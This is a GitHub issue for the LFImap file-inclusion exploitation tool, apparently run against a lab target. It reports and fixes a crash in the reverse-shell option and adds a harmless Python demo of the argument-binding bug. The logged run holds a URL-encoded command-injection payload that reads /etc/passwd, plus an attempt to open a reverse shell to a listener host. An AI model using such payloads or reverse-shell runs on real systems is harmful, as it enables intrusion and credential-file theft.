hansmach1ne / LFImap

Local File Inclusion discovery and exploitation tool
Apache License 2.0

Unhandled Exception when command injection is possible + '-x' for reverse shell #61

Closed hansmach1ne closed 2 weeks ago

hansmach1ne commented 2 weeks ago
└─$ python3 lfimap.py -U "http://10.10.200.85/vulnerabilities/exec/#" -D "ip=a&Submit=submit" -C "PHPSESSID=4827vaidcjprtcen3l7aoes9p0; security=low" -a -v --lhost 10.8.164.25 --lport 99 -x

[i] Testing form-line 'ip' parameter...

[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[i] Testing with input wrapper...
[i] Testing with data wrapper...
[i] Testing with expect wrapper...
[i] Testing with file wrapper...
[i] Testing remote file inclusion...
[i] Opening temporary local web server on port 8000 and hosting $LFIMAP_DIR/src/exploits that will be used for test inclusion
[i] Trying to include internet-hosted file...
[i] Testing path truncation using '/home/kali/Desktop/leet_toolz/LFImap/src/wordlists/short.txt' wordlist...
[i] Testing results-based OS command injection...
[+] RCE -> 'http://10.10.200.85/vulnerabilities/exec/#' -> HTTP POST -> 'ip=1%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%27%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%5C%22%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D&Submit=submit'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on 0.0.0.0:99
[.] Trying to pop reverse shell to 10.8.164.25:99 using bash via command injection...
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
  File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 477, in <module>
    main()
  File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 404, in main
    test_cmd_injection(url, post)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/cmdi.py", line 54, in test_cmd_injection
    r, br = REQUEST(u, reqHeaders, postTest, proxies, "RCE", "CMD")
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/request.py", line 221, in REQUEST
    if(init(res, "", exploitType, url, postData, headersData, exploitMethod)):
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/request.py", line 106, in init
    pwn(exploit)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/pwn.py", line 72, in pwn
    exploit_bash(exploit, "CMD", ip, port)
  File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/bash.py", line 79, in exploit_bash
    request.REQUEST(url, args.httpheaders, post.replace(config.tempArg, encode(bashPayloadStageOne)), post, config.proxies, "", "", exploit = True)
TypeError: REQUEST() got multiple values for argument 'exploit'

hansmach1ne commented 2 weeks ago

Fixed in https://github.com/hansmach1ne/LFImap/commit/935209fac9508ba577af31e37114528115496d5b.

bash.py: L79. Trivial fix, the function call had too many arguments, POST value specified twice.
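
The failure mode in the traceback, reproduced as an added example (not LFImap's code): an extra positional argument lands in the `exploit` slot and collides with `exploit=True`. The stub functions, their parameter names and the sample values are assumptions inferred from the two call sites visible in the traceback.

```python
import inspect

# Stand-in for LFImap's REQUEST(); parameter names are assumed from the
# traceback (six positionals at the cmdi.py call site, plus exploit=).
def request_stub(url, headers, post_data, proxies, exploit_type, exploit_method,
                 exploit=False):
    return {"post_data": post_data, "proxies": proxies, "exploit": exploit}

# Hardened variant (hypothetical): exploit is keyword-only, so a stray
# positional argument can never bind to it.
def request_kwonly(url, headers, post_data, proxies, exploit_type, exploit_method,
                   *, exploit=False):
    return {"post_data": post_data, "proxies": proxies, "exploit": exploit}

def check_call(func, *args, **kwargs):
    """Return None if the arguments bind to func's signature, else the error text."""
    try:
        inspect.signature(func).bind(*args, **kwargs)
        return None
    except TypeError as err:
        return str(err)

# Constructed sample values mirroring the shape of the two calls in the issue.
URL, HEADERS, PROXIES = "http://target.example/", {}, {}
POST = "ip=PLACEHOLDER&Submit=submit"
BROKEN = (URL, HEADERS, POST, POST, PROXIES, "", "")  # POST twice: 7 positionals
FIXED = (URL, HEADERS, POST, PROXIES, "", "")         # 6 positionals

def demo():
    return {
        # 7th positional fills 'exploit', then exploit=True collides with it
        "broken": check_call(request_stub, *BROKEN, exploit=True),
        "fixed": check_call(request_stub, *FIXED, exploit=True),
        # Without the keyword the same call "works", but every argument after
        # the duplicated POST is shifted one slot to the right
        "silent_shift": request_stub(*BROKEN),
        # Keyword-only 'exploit' rejects the extra positional outright
        "kwonly_broken": check_call(request_kwonly, *BROKEN),
    }

if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The `silent_shift` case shows why the keyword mattered here: without `exploit=True` the duplicated POST value would have been accepted and the proxy setting replaced by the POST string with no error raised.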